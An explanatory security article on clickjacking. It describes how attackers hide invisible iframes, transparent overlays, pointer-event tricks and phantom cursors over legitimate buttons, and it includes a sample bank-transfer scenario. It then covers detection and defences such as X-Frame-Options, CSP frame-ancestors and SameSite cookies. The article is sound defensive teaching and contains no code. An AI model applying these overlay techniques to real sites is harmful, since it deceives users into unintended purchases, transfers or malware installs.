A malicious website assault known as “clickjacking” tricks users into clicking on links they didn’t want to. Another name for a clickjacking assault is UI redressing. The reason for this is that the attacker “redresses” the user’s interface with an unseen frame, which deceives them into acting in ways they wouldn’t normally.
This article will assist you in comprehending clickjacking, identifying it, and taking preventative measures to shield your website’s visitors from these attacks.
What Is Clickjacking?
The most common type of clickjacking attacks are called overlay attacks. These are made possible by invisible frames (iframes) in which attackers cover a legitimate-looking web page with an interface that the user cannot see, for malicious purposes.
Used properly, iframes have many legitimate uses. For example, an iframe may be used to embed a video from Vimeo or YouTube into a blog post or other page of your website. The video can be played right from the page because it lives in an iframe.
In clickjacking, an iframe is used to make a user believe they are clicking one thing (downloading a PDF, for example) when they are actually doing something else (such as making an unintended purchase or downloading malware).
Overlays are not the only way to execute a clickjacking attack, but the end result of any type of clickjacking attack is that the user is tricked into unintended actions by malicious elements disguised as legitimate ones.
There is no indication there is a hidden UI layered over the original site. Users click a link or a button, expecting a particular action from the original site, and the attacker’s script runs instead. But the attacker’s script can also execute the expected action to make it appear nothing has gone wrong.
Clickjacking itself is not the end goal of the attack; it is simply a means of launching some other attack by making users think they are doing something safe. The actual attack can be virtually anything possible via web pages. This ranges from malicious actions, such as installing malware or stealing credentials, to more innocuous things, such as boosting click stats on unrelated sites, boosting ad revenues on sites, gaining likes on Facebook, or increasing views of YouTube videos.
The invisible page could be a malicious page, or a legitimate page the user did not intend to visit – for example, a page on the user’s banking site that authorizes the transfer of money.
There are several variations of the clickjacking attack, such as:
- Likejacking – a technique in which the Facebook “Like” button is manipulated, causing users to “like” a page they actually did not intend to like.
- Cursorjacking – a UI redressing technique that changes the cursor for the position the user perceives to another position. Cursorjacking relies on vulnerabilities in Flash and the Firefox browser, which have now been fixed.
Clickjacking attack example
- The attacker creates an attractive page which promises to give the user a free trip to Tahiti.
- In the background the attacker checks if the user is logged into his banking site and if so, loads the screen that enables transfer of funds, using query parameters to insert the attacker’s bank details into the form.
- The bank transfer page is displayed in an invisible iframe above the free gift page, with the “Confirm Transfer” button exactly aligned over the “Receive Gift” button visible to the user.
- The user visits the page and clicks the “Book My Free Trip” button.
- In reality the user is clicking on the invisible iframe, and has clicked the “Confirm Transfer” button. Funds are transferred to the attacker.
- The user is redirected to a page with information about the free gift (not knowing what happened in the background).
How Does a Clickjacking Attack Work?
Attackers may use several variations when designing a clickjacking attack, but here is one classic example of how an attack may play out.
- An Attacker Creates a Malicious Dummy Website
A clickjacker creates a malicious page (e.g., dummy.com) and includes an iframe containing the target website (a legitimate site, e.g., legit.com). Using styling, the iframe will be set to be invisible and positioned in a way that the invisible button in legit.com is located directly on top of a dummy button on dummy.com. This way, when the user clicks on the dummy button they see, they’re actually clicking on the invisible button.
- Victims Visit the Webpage
With their dummy web page in place, attackers typically use social engineering tactics, such as fraudulent emails, to entice victims to visit. The emails may tell victims they have won a prize or make them some irresistible offer to draw them in.
- Unintended Action is Executed
Once the attacker has tricked a victim into visiting the website, the victim clicks to claim a bogus offer or perform some other action. When they do, the action the attacker intended, rather than what the victim intended to do, is executed by the victim’s browser.
How to Detect Clickjacking
Technically speaking, any website that is open to being embedded in an iframe may be vulnerable to clickjacking attacks. This is why it’s so important for both website administrators and end users to be proactive in preventing them.
So how can you test your site’s vulnerability to clickjacking? One method is to code a specific page of HTML and use it to try to embed a sensitive page of your site in an iframe. The OWASP provides a sample of HTML code to perform this test.
Most methods for protecting against clickjacking rely on the origin of the page — i.e., the fact that the domain of the malicious page is different from the domain of the legitimate page (e.g., dummy.com vs. legit.com). So when running this test page, it’s best not to run it under the same domain as the targeted page (e.g. legit.com).
Once you run the HTML, it should tell you whether the page you are testing is vulnerable to clickjacking. With further testing, you can determine whether any protections already in place on the page could be evaded by a clickjacking attack.
How to Prevent Clickjacking
You can defend your website against clickjacking attacks via client-side or server-side prevention.
From the client side, there are three main methods of clickjacking prevention, all related to browsers.
- Intersection Observer API
- Browser Add-ons
There are also a handful of browser add-ons designed to guard against clickjacking, including NoScript and NoClickjack. These add-ons are not compatible with every browser, but their availability is on the rise.
- Frame Busting
Note: Frame Busting is exposed to being overridden by the containing, dummy, page.
Coming from the server side, there are several ways to guard against clickjacking. Where possible, it’s best to use more than one method to improve your defenses.
- X-Frame-Options Header
This frame option can be added to HTTP as a response header. The HTTP response header is designed to allow the server to tell the client (web browser) if the specific page is allowed to be shown within an iframe. Most major browsers enforce this restriction. Once the website administrator establishes the X-Frame-Options of the site, the header will enforce one of the following framing policies as designated:
- SAMEORIGIN: only framing from the same website(s) is allowed
- DENY: all framing is forbidden
X-Frame-Options is an older alternative and became obsolete by the Content Security Policy standard (covered below), yet it is still supported by modern browsers.
- frame-ancestors Directive in Content Security Policy
The frame-ancestors directive is designed to replace the X-Frame-Options header. As part of Content Security Policy (CSP), the frame-ancestors directive can either allow or disallow framed content from being embedded. On pages that include both the X-Frame-Options header and frame-ancestors directive, the frame-ancestors policy is usually given preference by the browser.
- SameSite Cookie Attribution
While SameSite cookie attribution is usually used to defend a site against cross-site request forgery (CSRF), it can also help fend off clickjacking. It prevents a cookie from being sent in case the request originated from a third party. For clickjacking, this means that even if the webpage was shown in an iframe and the victim did click on a button unintentionally, any cookie that should normally be sent with the request following the click will not be sent (for example, a session cookie).
If users can avoid falling victim to social engineering, clickjacking attacks will be less successful. Following a handful of common-sense rules can help users keep safe from the social engineering tactics that hackers use to prey on them:
- Don’t click on pop-ups, especially on sites you don’t use regularly. Many of them are malicious.
- Pay attention to any browser warnings on the sites you visit. If you are warned not to proceed, don’t.
- Don’t click a link in any email from an unfamiliar source. Before clicking a link that looks trustworthy, check for spelling errors and note whether it’s an HTTP or HTTPS link. Most trustworthy sites use HTTPS.
- Text-based clickjacking is becoming more common. Do not click any links in a text from an unknown sender.
If employed by your organization, multi-factor authentication can help guard against social engineering. Keep in mind that this is mainly relevant to workforce users, since CIAM platforms cannot count on educating their customers to beware of social engineering.
Would-be attackers are relentless in their efforts to compromise your system across multiple attack vectors. To defend your organization and its users, you must be just as vigilant about improving your cybersecurity posture.
Types of Clickjacking Attacks
Clickjacking attacks are typically performed by arranging or manipulating the website’s visible interface in a way so that the victim isn’t aware of the attack. This deception can lure users into performing actions like downloading malware, transferring money to target accounts, exploiting auto-fill functionalities in password managers, or even accessing the victim’s computer.
Let’s dive in and explore some of the different types of clickjacking attacks.
One of the most common types of clickjacking attacks, overlaying malicious content on top of the existing page can be accomplished in a few different ways:
- Invisible iframes: The attacker loads an invisible 1×1 iframe that prevents the user from seeing the content. The invisible iframe’s target element, such as a button on the website, is centered under the victim’s cursor making it easy to trick the user into clicking the malicious content.
- Pointer events: A floating div tag is created that completely covers the target UI element. The attacker sets CSS pointer-events property to ‘none’ which makes clicks go through it, making them register on the iframe behind it.
- Transparent overlays: The attacker overlays a transparent window on top of an element that the user will click on. The victim does not see the transparent window and believes they are clicking on the legitimate button or link element. But since the attacker’s transparent window is the top-most content on the page, the click is hijacked by the attacker.
Rapid content replacement
In this attack, blurred overlays are created to cover target elements on the web page. The action is carried out almost instantly (milliseconds) right before the victim engages with the web page. This technique requires the attacker to predict the timing of the click with some accuracy. The overlay is visible only long enough to capture the click before it is concealed.
Phantom mouse cursors
Using floating div tags, an attacker can simulate an additional mouse cursor and set it to be a fixed distance from the victim’s real mouse pointer. The attacker will then position the page so that the deceptive cursor is more prominent and place an element that they want the victim to click on the page. The user will see a fake cursor that emulates their own mouse movements and be tricked into clicking on the malicious element before they realize what happened.